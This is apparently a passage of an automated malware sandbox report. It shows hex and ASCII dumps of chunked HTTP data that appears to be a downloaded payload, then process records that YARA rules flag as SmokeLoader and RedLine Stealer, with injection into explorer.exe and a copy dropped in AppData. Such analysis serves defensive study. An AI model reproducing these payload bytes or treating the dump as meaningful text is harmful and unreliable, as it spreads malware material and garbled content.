af aa 48 da 1a 7d b0 1a 59
                  Data Ascii: 2000A}`$JC'C:&bAvS/t%iNGF1H"Ihk:f?zO"Hyl+v<NTKgb:\pPHC'(520b$.b3>J@5oaOVeawK~lq!'j(1eV()ef<KQ:dH}Y
                  2022-10-10 21:21:48 UTC487INData Raw: fd e7 2f cd 75 fc
                  Data Ascii: /u
                  2022-10-10 21:21:48 UTC487INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC487INData Raw: 32 30 30 30 0d 0a 25 d7 3c 9c 7f 31 11 14 85 b8 4b 9a b1 9e b6 83 f8 7a 56 89 39 3f f3 1e 33 aa 52 b1 d2 14 e6 5a bf 27 b6 1e 8e f8 b2 14 b5 3c db 9a f5 6f 6d 4d 2c a4 3c 12 77 8e 53 cb aa 3b bd dd 03 f0 e4 fe ee 13 57 1d 55 d6 cd 2a 43 7a 1c c6 42 67 9e 7c 25 e3 a1 cd 54 c9 e1 65 37 02 c4 0a d0 75 ae 6c 93 65 93 e3 aa 13 7f 08 50 38 2e b5 eb 80 c3 07 ae ce 09 7d d5 90 5e 95 61 e5 37 2a 2f f7 53 03 c7 8e 1a 94 ef f8 fc 67 c7 b6 b1 dd 93 3d 57 30 3a 0e 65 bb 08 cc fa 8d 9f 08 2e 85 dc 9e ee 76 42 51 a6 1c c9 be 38 93 14 e2 b6 76 b5 7f ce 5e 6a 2f 5a 42 dc d9 d7 45 1c 97 e5 91 6a ff ae 01 c3 22 36 89 60 d6 59 36 b6 e5 33 dc 7b e4 f1 20 29 4b 0d 28 9f 22 18 a2 3b e6 7f 25 5f ef c1 f9 dc 29 d8 7f 79 6f 63 79 23 e3 0e 57 55 6a 79 bf 3f 93 3f 42 03 66 41 2b 83
                  Data Ascii: 2000%<1KzV9?3RZ'<omM,<wS;WU*CzBg|%Te7uleP8.}^a7*/Sg=W0:e.vBQ8v^j/ZBEj"6`Y63{ )K(";%_)yocy#WUjy??BfA+
                  2022-10-10 21:21:48 UTC495INData Raw: 11 d6 8e e7 01 c9
                  Data Ascii:
                  2022-10-10 21:21:48 UTC495INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC495INData Raw: 32 30 30 30 0d 0a 90 07 41 fb bd 7e e9 ef 1d 04 f8 ea 27 5b ae e6 9d 2b 8a fa 1f ae 51 a5 fd 15 6a 2d 87 c9 cb 8f 48 b3 a3 7e 93 fc 17 69 39 92 fa f5 11 58 b0 6f fb 27 75 6a ec 52 b5 15 71 48 eb 67 3b 3c 8a 4d b2 7d 6c b6 df 41 eb b0 25 69 6f 06 20 45 20 e7 ee ca c4 18 9b 88 cc c7 d1 30 7b dc 81 a1 e8 b4 3d 6c 26 70 ac 9a f8 ad 6b 89 60 0e f5 c8 fa 0e 09 40 02 07 e2 e9 1e e1 75 4a 7b a6 11 1d 43 a9 11 cf ee 60 a0 ab 02 6b e8 a3 1e ab 16 47 44 63 9b 73 13 40 45 fe 63 cc 30 ad 78 66 55 a3 0c 61 bf 24 7f 6c 80 91 84 2a f2 cf f4 98 63 e0 37 63 50 8b 40 0c 10 a9 77 e4 61 08 31 97 7c 80 4b 9e f0 fa 80 1d 5e af 0a b3 40 c8 04 5f 38 18 6c 62 ee 3a 96 3d e9 05 8f 86 e7 67 48 e3 b5 b3 10 a7 1d b0 dc 7d 05 15 bb b6 14 5e f4 93 d1 3e 40 b2 08 5c 00 c0 f3 b2 ad b8 3a
                  Data Ascii: 2000A~'[+Qj-H~i9Xo'ujRqHg;<M}lA%io E 0{=l&pk`@uJ{C`kGDcs@Ec0xfUa$l*c7cP@wa1|K^@_8lb:=gH}^>@\:
                  2022-10-10 21:21:48 UTC503INData Raw: 8c f0 ee 2f 6d ba
                  Data Ascii: /m
                  2022-10-10 21:21:48 UTC503INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC503INData Raw: 32 30 30 30 0d 0a b8 33 99 ff 66 d5 56 95 2e 6b 38 71 67 74 48 57 c9 47 f4 23 1b dd 9c 39 e8 c4 10 10 ce a5 6b 45 11 4e 9c 3d 8d da 6d 45 dc 75 7f 79 c9 9a 9a d8 ba 0a 76 81 34 ae 8c db d0 71 6e 3f 33 79 e7 7c db 49 40 c0 40 c7 19 bc b5 2a 61 ea 03 83 42 43 0c 41 60 57 c8 36 b3 d2 a3 7f f4 23 8b ba a1 44 2e fe 4e 0a 0d 68 60 cb 7a 32 33 9f e6 1d ba 62 58 75 55 a4 71 00 e9 fa aa 4b 09 a5 bc c7 38 e9 00 23 f8 31 d6 92 8f e2 26 31 89 b2 22 40 1c b5 d2 8a 86 3e 4c 29 46 40 3c 99 0d 7a 85 41 13 9d 47 4f ba 7e af 6f a1 29 c2 c8 2a 70 82 94 69 51 1c 4f 7b 0d 86 b1 74 e3 36 5f eb 9a 7a 37 d1 17 ff 10 b8 90 87 f6 81 b2 5d 1a 5a 3c fc 1c 3e 16 9d 49 c6 b7 61 cb 16 1d 41 f1 22 4c 4c 44 36 5b 7a 38 c3 c7 be 11 1e d7 29 6b a3 b8 db 5e 25 a3 d6 b2 02 a0 ac 9d 65 ab 77
                  Data Ascii: 20003fV.k8qgtHWG#9kEN=mEuyv4qn?3y|I@@*aBCA`W6#D.Nh`z23bXuUqK8#1&1"@>L)F@<zAGO~o)*piQO{t6_z7]Z<>IaA"LLD6[z8)k^%ew
                  2022-10-10 21:21:48 UTC511INData Raw: 2b 0b 58 92 c1 79
                  Data Ascii: +Xy
                  2022-10-10 21:21:48 UTC511INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC511INData Raw: 32 30 30 30 0d 0a 99 d6 1f da 5b 67 15 bc 87 88 12 27 67 4e 58 fd ad 6a d3 2b a0 87 99 bf 6d b7 5b 12 6f d1 cc 62 6d a6 40 57 26 e0 85 70 8c 83 28 67 bb 14 5f 4c 15 0b 82 07 92 87 f1 35 77 20 4a 3e 4c 02 63 33 e6 e9 47 a5 3d 56 d2 8a 1c e1 29 52 69 81 c0 da 3c 10 ee 09 df 6c 50 f1 65 16 b6 47 f2 e2 14 15 17 53 7e dc 7e e1 da 05 99 a0 62 13 06 bc dd 4d f7 24 9d 94 64 a4 24 b5 5b 5c ce d3 31 74 0c ed 97 40 5a b4 09 ce bf be cd 1f 60 c2 a7 33 4d ab bb dc 95 41 64 5d 5a ef 22 05 26 ba 74 29 a7 27 4e f3 d9 1c ce 1b 25 ba c3 36 c3 44 62 52 5a 92 ae e8 72 6a fb a8 7b 48 a1 7e 8b 64 e1 e5 03 94 a8 10 64 39 76 af 20 bc 75 4a 47 68 74 57 56 f1 1d 2f f9 a4 73 b1 8e fc 31 0f 32 1e 50 e8 4b a8 ad 5d c1 63 05 d9 33 b0 ee dc c5 2b 0f ed ed b0 dc fd 48 ad 19 9a 1f c2 9a
                  Data Ascii: 2000[g'gNXj+m[obm@W&p(g_L5w J>Lc3G=V)Ri<lPeGS~~bM$d$[\1t@Z`3MAd]Z"&t)'N%6DbRZrj{H~dd9v uJGhtWV/s12PK]c3+H
                  2022-10-10 21:21:48 UTC519INData Raw: 7d 7d 7d 7d 7d 7d
                  Data Ascii: }}}}}}
                  2022-10-10 21:21:48 UTC519INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC519INData Raw: 31 66 66 38 0d 0a 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d c0 d5 bd bd 3a 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d f2 5f 15 c1 64 6c 1b c9 49 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 3c f4 20 62 98 60 d5 e5 d1 67 e3 07 7d 7d 7d 7d 7d 7d 7d 7d 7d c9 15 9b c2 66 9b 6e 9d 9d 67 57 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 8d 8d 88 92 c1 0d 78 78 6e 21 d6 78 d0 3f 5c 00 2f 8d 7d 7d 7d 7d c9 15 b7 35 b2 81 51 92 2f 52 e7 db 20 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 5f 9d 08 42 b7 b7 ea d7 b2 f8 b2 13 36 66 78 64 19 cf f4 7d 7d bd e5 c2 ed b7 64 92 be 7b 8c f5 ef 71 bc 3a
                  Data Ascii: 1ff8}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}:}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}_dlI}}}}}}}}}}}}}}}}}< b`g}}}}}}}}}fngW}}}}}}}}}}}}}}xxn!x?\/}}}}5Q/R }}}}}}}}}}}}}_B6fxd}}d{q:
                  2022-10-10 21:21:48 UTC527INData Raw: 32 30 30 30 0d 0a
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC527INData Raw: 6d 8b d2 ca 6d 8b cc c4 7a 8b c0 cc 6a 81 c2 ce 80 8b dc d0 72 85 be e1 6c 7d b3 c7 57 80 a9 c6 44 80 9d ce 3c 84 94 84 3d 85 8e 88 47 81 96 c7 68 85 b6 c3 62 8d bf cc 64 84 d2 c3 4e 7a a2 c6 35 7d 9e c8 7d 7e ab cf a9 c1 c2 cc 82 b4 d5 cc 81 ac be d0 7f b6 cc c2 7b a1 cd d1 7a b0 c4 d5 7a b2 ca d1 7e 89 be ca 2f 81 99 d0 2b 7b 8e 81 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e d2 d6 27 7f d4 cf 26 42 83 98 81 46 7e 85 d4 3c 7b a3 c4 6b 7a c2 c9 68 80 ce c2 6d 8c c2 d6 6b 82 d1 cd 5e 80 af d1 5d 7e bf cf 45 81 a1 c6 36 83 a1 d3 42 7c 9a cf 3e 7f 99 cf 47 84 95 d4 37 7d a5 c7 4b 7c a4 d0 5a 7e ae ce 52 7e af cb 68 81 c1 cc 6e 79 c5 c7 67 81 c2 c5 70 83 d3 d5 51 80 a5 cc 41 7e 9e b7 40 7b a4 cd 5e 7f a8 d1 73 95 c3 c8 6d 90 ca ca 4b 7e a4 cb 46 7c 90
                  Data Ascii: mmzjrl}WD<=GhbdNz5}}~{zz~/+{~'&BF~<{kzhmk^]~E6B|>G7}K|Z~R~hnygpQA~@{^smK~F|
                  2022-10-10 21:21:48 UTC535INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC535INData Raw: 32 30 30 30 0d 0a 67 86 b9 c0 5a 83 91 be 83 83 b4 cf 7c ab a7 c9 84 a0 bd c7 80 7d b3 c5 37 85 99 9f 56 63 80 6e 7f 2c 7c 2a 7f 24 7d 27 00 00 00 00 00 00 00 00 69 80 7f 55 38 7d 91 7d 44 80 9f ba 4d 80 b8 c9 73 7c c5 d1 75 83 da c1 6a 7e c9 c4 66 87 c6 d0 79 80 cd cd 64 92 c8 c3 76 83 c4 c9 6e 93 be cc 74 79 be cb 63 7c b7 c6 57 80 9e be 57 7e 8b 7c 4b 7b 9c 81 52 83 b5 cb 61 8d d0 ce 68 7a b2 c3 57 7c a2 cc 81 84 b2 cf 80 b6 c2 c6 7a b8 c3 cc 7f bd cb d1 7e b0 c8 c8 5d 7e b5 bc 37 6e 7f 7b 7e 3d 7d 26 80 3b 7f 2e 00 00 00 00 7b 7f 84 53 30 7e 9c 86 3b 82 b0 cc 63 81 c1 d3 60 7d c5 c3 4e 7e a8 c8 53 86 a9 cb 53 80 a2 cf 52 83 a5 c4 6d 7e a2 cf 5c 85 a2 c8 58 82 a6 cc 4d 83 a3 d5 6f 7d c3 c2 73 7a b9 ce 57 7e c5 d0 53 82 a3 c6 53 7b ae ce 6a 86 c8 ca 62
                  Data Ascii: 2000gZ|}7Vcn,|*$}'iU8}}DMs|uj~fydvntyc|WW~|K{RahzW|z~]~7n{~=}&;.{S0~;c`}N~SSRm~\XMo}szW~SS{jb
                  2022-10-10 21:21:48 UTC543INData Raw: f7 00 0a 00 30 00
                  Data Ascii: 0
                  2022-10-10 21:21:48 UTC543INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC543INData Raw: 32 30 30 30 0d 0a 59 bb f8 00 6e 9f d9 00 04 80 44 00 ce ec da 00 1a 82 5c 00 33 96 80 00 5c b2 98 00 50 a7 8c 00 09 6e 98 00 44 aa f7 00 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 e1 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 e4 48 48 48 48 48 48 48 48 48 48 48 34 ac 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 d4 34 e4 48 48 48 48 48 48 48 48 48 99 34 bd c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 d4 34 48 48 48 48 48 48 48 99 99 29 34 c6 c6 bf e5 e5 e5 e5 e5 20 e5
                  Data Ascii: 2000YnD\3\PnDHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH4444444444444444444444444444444444HHHHHHHHHHH44HHHHHHHHH44HHHHHHH)4
                  2022-10-10 21:21:48 UTC551INData Raw: c1 f1 07 64 c3 f4
                  Data Ascii: d
                  2022-10-10 21:21:48 UTC551INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC551INData Raw: 32 30 30 30 0d 0a 06 64 c3 f7 0b 66 c1 f6 09 61 c2 f4 0d 64 bd f1 07 62 c0 fa 08 66 c0 f8 04 68 c5 f7 05 66 bf f3 03 69 be f6 05 68 c4 f5 09 68 c2 fc 0c 68 c0 f7 0f 66 c2 f7 0c 65 c2 f7 0d 69 c1 f7 0c 69 bb f3 0d 64 be f9 11 6b c3 f4 0e 6a c1 f5 0e 68 c0 f5 08 69 c3 a9 30 81 c1 1f c8 fd cd 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 66 c2 49 05 64 c4 f6 39 80 c9 f5 7f a5 da fa 7f a4 de f9 7f a7 d9 f5 81 a1 de f7 7e a5 db f4 7f a3 dd f2 7f a5 df f8 7f a4 dc f7 7f a6 db f6 7e a5 da f4 80 a7 e0 f6 80 a0 dd fa 7e a4 d9 f5 80 a5 dc f8 80 aa da f7 81 a5 da f8 7f a8 d7 f6 80 a9 da f6 7e a6 d3 f7 81 a9 da fb 82 a7 d8 f4 81 a9 d8 f9 81 a5 da f0 82 a4 d7 f6 82 a5 d8 fa 80 a7 dc f3 81 a5 da f6 80 a5 de f7 7f
                  Data Ascii: 2000dfadbfhfihhhfeiidkjhi0fId9~~~~
                  2022-10-10 21:21:48 UTC559INData Raw: 00 00 00 00 00 00
                  Data Ascii:
                  2022-10-10 21:21:48 UTC559INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC559INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e2 ff c1 05 e2 ff c1 05 e2 ff c1 05 e2 ff c1 05 e2 ff c1 05 e2 ff c1 05 e2 ff c1 05 e2 ff c1 05 e2 ff c1 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e2 ff c1 05 e2 ff c1 05 e2 ff c1 05 e2 ff c1 05 e2 ff c1 05 e2 ff c1 05 e2 ff c1 05 e2 ff c1 05 e2
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC567INData Raw: c1 c1 c1 c1 c1 c1
                  Data Ascii:
                  2022-10-10 21:21:48 UTC567INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC567INData Raw: 32 30 30 30 0d 0a 09 c1 09 09 09 09 09 09 ff 09 ff 09 ff 09 ff 09 ff 09 ff 2d b7 e7 db db db db db db e7 b7 cf cf c1 cf c1 cf c1 cf c1 c1 c1 c1 cf c1 c1 c1 c1 c1 c1 09 c1 c1 c1 09 09 09 09 09 09 09 09 09 09 09 09 09 09 2d b7 e7 db db db db db db e7 b7 cf cf c1 cf c1 cf c1 cf c1 cf c1 c1 c1 c1 c1 c1 c1 c1 c1 c1 c1 09 c1 c1 09 5f 5f 5f 09 09 09 09 09 09 09 09 09 2d b7 e7 db db db db db db e7 b7 eb cf c1 cf c1 cf c1 cf c1 c1 cf c1 cf c1 c1 cf c1 c1 c1 c1 c1 c1 09 c1 c1 09 5f 5f 5f 09 09 09 09 09 09 09 09 2d b7 e7 db db db db db db e7 b7 cf cf cf c1 cf c1 cf c1 cf c1 c1 c1 c1 cf c1 c1 c1 c1 c1 c1 c1 c1 c1 09 c1 c1 09 5f 5f 5f 09 09 09 09 09 09 09 2d b7 e7 db db db db db db e7 b7 eb cf cf cf cf cf c1 cf c1 cf cf c1 cf c1 c1 c1 cf c1 c1 c1 c1 c1 c1 c1 09 c1 5f
                  Data Ascii: 2000--___-___-___-_
                  2022-10-10 21:21:48 UTC575INData Raw: 7e d5 80 7e 7f dc
                  Data Ascii: ~~
                  2022-10-10 21:21:48 UTC575INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC575INData Raw: 32 30 30 30 0d 0a 80 7e 7f d4 80 7f 7e ca 81 80 80 d3 80 7f 7f d0 7e 80 80 d5 7e 7f 80 d0 80 80 7f cf 7e 80 7f d7 7f 7f 7f de 80 80 81 cb 80 81 80 da 7e 7e 7e d2 81 7f 7e d6 7f 7f 80 d2 80 80 80 d7 80 80 7f d8 7e 80 80 d9 80 80 80 d1 81 81 80 d0 80 7e 80 cd 80 80 7e d6 7f 81 7f d5 7f 80 80 ce 80 7f 80 ce 80 7f 80 da 7f 7e 80 d9 7f 7f 7f cf 80 80 81 d5 80 7e 80 ce 7e 81 80 d1 7e 80 7f c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 7f 7f d2 7f 80 80 d4 7e 88 80 cf 89 89 8a d4 85 88 86 ca 8e 8c 8a d4 89 91 89 d3 8c 88 82 d5 8c 87 91 d2 8a 87 82 d8 89 85 8a d8 8c 8b 8a d2 89 80 87 d4 86 8b 8b d9 8d 86 8c cf 8f 7e 83 d9 8b 83 81 d4 88 80 7e d7 86 87 80 cf 84 85 7f d1 92 85 90 cd 81 81 83 ce 83 89 8b d0 84 89 8a cf 85 8f 85 d7 87
                  Data Ascii: 2000~~~~~~~~~~~~~~~~~~~
                  2022-10-10 21:21:48 UTC583INData Raw: 00 00 00 00 00 00
                  Data Ascii:
                  2022-10-10 21:21:48 UTC583INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC583INData Raw: 31 66 66 38 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d9 b5 80 25 db b1 81 2d d8 b0 7f 29 d5 ae 80 2c d0 ac 7f 28 d2 b1 80 29 d9 ae 80 2b d2 ad 7e 2b da b1 7f 28 de b7 80 22 db ac 80 2d d9 b2 81 2e d9 b2 7f 32 d2 aa 80 2e e3 b0 80 2c da b2 7e 30 d9 a9 7f 29 e7 b2 7e 2c d8 b8 81 28 da b9 7e 27 d9 a6 80 29 d4 ae 7f 2e d6 bc 80 2e d4 b5 7f 34 d6 b2 81 2c d7 ae 80 2b cf b3 7f 27 df b4 7f 2a d7 b5 80 2a cf bd 7f 33 d6 a8 80 2a d8 a8 80 29 d5 b4 7f 33 d8 a8 7f 28 e5 aa 81 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: 1ff8%-),()+~+("-.2.,~0)~,(~')..4,+'**3*)3(3
                  2022-10-10 21:21:48 UTC591INData Raw: 32 30 30 30 0d 0a
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC591INData Raw: ce ca cb cc 6c 80 91 c8 8f c8 d2 d9 7e a5 cd d0 77 96 da d1 5b 81 84 dd b7 c4 bf da b7 ca c9 cf 7f 81 81 d7 d6 98 95 32 00 00 00 00 7f 7f 7f d7 ce d6 da d1 d3 ca cb cc cb d4 cf cd cc cd ca d4 cc c5 c7 d7 c3 c8 c3 dc 63 80 7e d8 8a cb d4 d0 81 b2 cc d0 7a 96 c9 da 5a 81 8a d6 c3 c4 b8 db 80 7f 80 d6 ca d8 a9 2a 00 00 00 00 7f 7e 80 d6 cf d6 d9 d2 d7 cf d9 d3 cd d0 ce d7 cf c2 c8 d7 cb d1 ca dc c9 ce c9 d6 d2 cc bc d0 65 7f 8c dc 9e c6 c8 d7 80 b1 cf d8 7a 98 d2 d3 5c 7f 82 de 7f 80 80 d4 00 00 00 00 00 00 00 00 8a 80 6e d6 92 7e 6b dd 89 7f 66 d0 99 7f 6e c9 8f 7f 68 d2 97 80 70 d2 86 81 6c d0 94 7f 70 d9 92 80 65 d8 63 7f 84 d1 9f bc d4 d4 7f b9 d0 d2 80 a9 cd de 60 7e 86 d5 b6 bc 8e 2a 00 00 00 00 92 80 63 cf cf cb 89 ce d3 c4 7f ce d2 b3 82 d0 c9 ba 81
                  Data Ascii: l~w[2c~zZ*~ez\n~kfnhplpec`~*c
                  2022-10-10 21:21:48 UTC599INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC599INData Raw: 32 30 30 30 0d 0a 67 61 73 20 79 61 6e 69 7a 69 7a 75 63 65 6b 6f 67 20 67 69 63 61 73 6f 7a 61 68 20 6a 69 79 61 2e 20 48 6f 6e 75 77 61 76 61 78 6f 77 69 7a 61 6c 20 7a 61 62 65 77 65 6b 20 66 61 64 65 70 6f 72 6f 20 70 69 6a 65 78 69 2e 20 50 75 68 6f 74 20 72 75 70 75 63 20 6a 61 66 6f 70 69 67 75 64 75 20 70 65 77 69 6d 61 6c 69 20 66 61 6c 6f 62 65 6c 6f 76 2e 20 54 6f 6a 69 67 65 6b 69 6b 65 73 75 74 6f 74 2e 20 54 75 76 69 6d 69 20 79 75 76 6f 2e 20 42 6f 72 75 62 75 63 75 74 69 68 20 73 69 78 69 68 65 20 6a 75 74 65 73 65 74 75 6d 65 2e 20 47 61 68 65 67 69 66 69 76 20 76 69 77 6f 72 69 7a 20 6d 69 66 61 2e 20 46 6f 72 61 67 61 76 65 6e 6f 79 65 77 6f 20 63 61 6b 69 20 79 75 7a 69 76 75 20 70 61 73 65 2e 20 47 65 66 69 6c 65 20 63 6f 73 65 62 69
                  Data Ascii: 2000gas yanizizucekog gicasozah jiya. Honuwavaxowizal zabewek fadeporo pijexi. Puhot rupuc jafopigudu pewimali falobelov. Tojigekikesutot. Tuvimi yuvo. Borubucutih sixihe jutesetume. Gahegifiv viworiz mifa. Foragavenoyewo caki yuzivu pase. Gefile cosebi
                  2022-10-10 21:21:48 UTC607INData Raw: 00 00 00 00 00 00
                  Data Ascii:
                  2022-10-10 21:21:48 UTC607INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC607INData Raw: 31 30 34 38 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: 1048


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:23:19:44
                  Start date:10/10/2022
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\file.exe
                  Imagebase:0x400000
                  File size:281600 bytes
                  MD5 hash:28167CBFD672C0FC70358D19DE3826EB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.378991345.0000000000941000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.378991345.0000000000941000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.378728276.0000000000610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.378728276.0000000000610000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.378830916.0000000000652000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  Reputation:low

                  General

                  Target ID:1
                  Start time:23:19:53
                  Start date:10/10/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff69bc80000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.360730072.0000000002901000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.360730072.0000000002901000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high

                  General

                  Target ID:2
                  Start time:23:20:39
                  Start date:10/10/2022
                  Path:C:\Users\user\AppData\Roaming\ichffhi
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\ichffhi
                  Imagebase:0x400000
                  File size:281600 bytes
                  MD5 hash:28167CBFD672C0FC70358D19DE3826EB
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.431249824.0000000000643000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.431007198.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 44%, ReversingLabs
                  Reputation:low

                  General

                  Target ID:6
                  Start time:23:21:47
                  Start date:10/10/2022
